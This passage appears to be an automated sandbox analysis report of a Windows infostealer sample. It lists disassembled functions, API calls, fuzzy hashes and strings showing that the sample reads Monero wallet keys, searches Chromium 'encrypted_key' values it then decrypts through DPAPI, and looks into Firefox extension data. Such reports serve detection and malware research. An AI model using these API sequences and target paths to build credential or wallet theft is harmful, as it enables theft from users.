                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 16b07078e27d77f5f72987aa9dced1a1f4f6a30e2db2d16c9a782aa6f726eedd
                                • Instruction ID: fc5bf7356231f4abc5c9edc2a736f15daa44cacd9161d384a6094f77e1db9792
                                • Opcode Fuzzy Hash: 16b07078e27d77f5f72987aa9dced1a1f4f6a30e2db2d16c9a782aa6f726eedd
                                • Instruction Fuzzy Hash: 7181D873920118ABDF04FBA8DD96EEE7339EF14304F504569F506A6091EE346A09DBB2
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00DA1580,00DA0D92), ref: 00D8F54C
                                • lstrlen.KERNEL32(00000000), ref: 00D8F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: dd8b1754abc915fe849e947725eea5c72419c6bcc44f158fc055fc291dc0d6bd
                                • Instruction ID: dc544afe6fe8a25f2b265e7f76d8ab8bf525a8a413004b39aea227b9c42ee7df
                                • Opcode Fuzzy Hash: dd8b1754abc915fe849e947725eea5c72419c6bcc44f158fc055fc291dc0d6bd
                                • Instruction Fuzzy Hash: 0F51DB76D10118AADF04FBA8DC96DED7779EF54300F408529F816A7191EE346A09CBF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: bca8c77dbcf9041a32af979cc495edae95b34f80e943e314189b1f9921472068
                                • Instruction ID: d1c19d065b306d9393c8fb7b6621d72cd92a7cd016aaaae3d550d79ba2408e63
                                • Opcode Fuzzy Hash: bca8c77dbcf9041a32af979cc495edae95b34f80e943e314189b1f9921472068
                                • Instruction Fuzzy Hash: 4E41FB72D10109AFCF04EFE8D946AEEB7B4EF54704F148418E51676290DB75AA09CBB2
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D89D39
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
                                  • Part of subcall function 00D89AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
                                  • Part of subcall function 00D89AC0: LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
                                  • Part of subcall function 00D89B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D89B84
                                  • Part of subcall function 00D89B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D89BA3
                                  • Part of subcall function 00D89B60: LocalFree.KERNEL32(?), ref: 00D89BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: d97be5f81a7d3d7b601ee21ba12cd0a32a601c606da4cc74234ad40a65eadfa3
                                • Instruction ID: 6657c0c788a701ea204e653f586d4613190a4b8dfc03a602dcac52304a65a7d9
                                • Opcode Fuzzy Hash: d97be5f81a7d3d7b601ee21ba12cd0a32a601c606da4cc74234ad40a65eadfa3
                                • Instruction Fuzzy Hash: 563110B6D10109ABCF04EBE4DC96AFEB7B8EF48304F184519E905A7241E7359A04CBB5
                                APIs
                                • CreateFileA.KERNEL32(00D93AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00D93AEE,?), ref: 00D992FC
                                • GetFileSizeEx.KERNEL32(000000FF,00D93AEE), ref: 00D99319
                                • CloseHandle.KERNEL32(000000FF), ref: 00D99327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 4fa365345c519b41e9a32d15893273d87561420d8a75cf53ff4e5a690e5ab984
                                • Instruction ID: da0d5b44ee633cbf8cffad01040d67c50dc3b670ffe6109656544c9f5c5ae8e7
                                • Opcode Fuzzy Hash: 4fa365345c519b41e9a32d15893273d87561420d8a75cf53ff4e5a690e5ab984
                                • Instruction Fuzzy Hash: 98F03775E4020CFBDF10DFB4DD5AF9EB7B9AB48720F108258BA51A72C4D670AA019B60
                                APIs
                                • __getptd.LIBCMT ref: 00D9C74E
                                  • Part of subcall function 00D9BF9F: __amsg_exit.LIBCMT ref: 00D9BFAF
                                • __getptd.LIBCMT ref: 00D9C765
                                • __amsg_exit.LIBCMT ref: 00D9C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00D9C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: a34b9b714686bdd41bcc5e074eeb04c9583d152bb8bc3bc2e64ea9e2bdf55ed7
                                • Instruction ID: b8bd0a2c035b757eb4767598088705e377da1cf5dc35ce3311fa95c9dcc410db
                                • Opcode Fuzzy Hash: a34b9b714686bdd41bcc5e074eeb04c9583d152bb8bc3bc2e64ea9e2bdf55ed7
                                • Instruction Fuzzy Hash: FAF09A32E107009BDF20BFF8A946B5A33A0EF00731F25524AF404A62D2DB7459419EB6
                                APIs
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94F7A
                                • lstrcat.KERNEL32(?,00DA1070), ref: 00D94F97
                                • lstrcat.KERNEL32(?,01829168), ref: 00D94FAB
                                • lstrcat.KERNEL32(?,00DA1074), ref: 00D94FBD
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D9492C
                                  • Part of subcall function 00D94910: FindFirstFileA.KERNEL32(?,?), ref: 00D94943
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FDC), ref: 00D94971
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FE0), ref: 00D94987
                                  • Part of subcall function 00D94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D94B7D
                                  • Part of subcall function 00D94910: FindClose.KERNEL32(000000FF), ref: 00D94B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 74fb9b603ec8fa7f470e13cea57d6fdf91becf8a118677f3316009954efc53c0
                                • Instruction ID: a2572b19c47a3694cdd6e3b37c52b6c73febd08909bd0ed14238e4a04d448b09
                                • Opcode Fuzzy Hash: 74fb9b603ec8fa7f470e13cea57d6fdf91becf8a118677f3316009954efc53c0
                                • Instruction Fuzzy Hash: BF21887A90020C6BCB54F7B0ED47EE9333CEB55704F004558B65993181EE75A6CD9BB2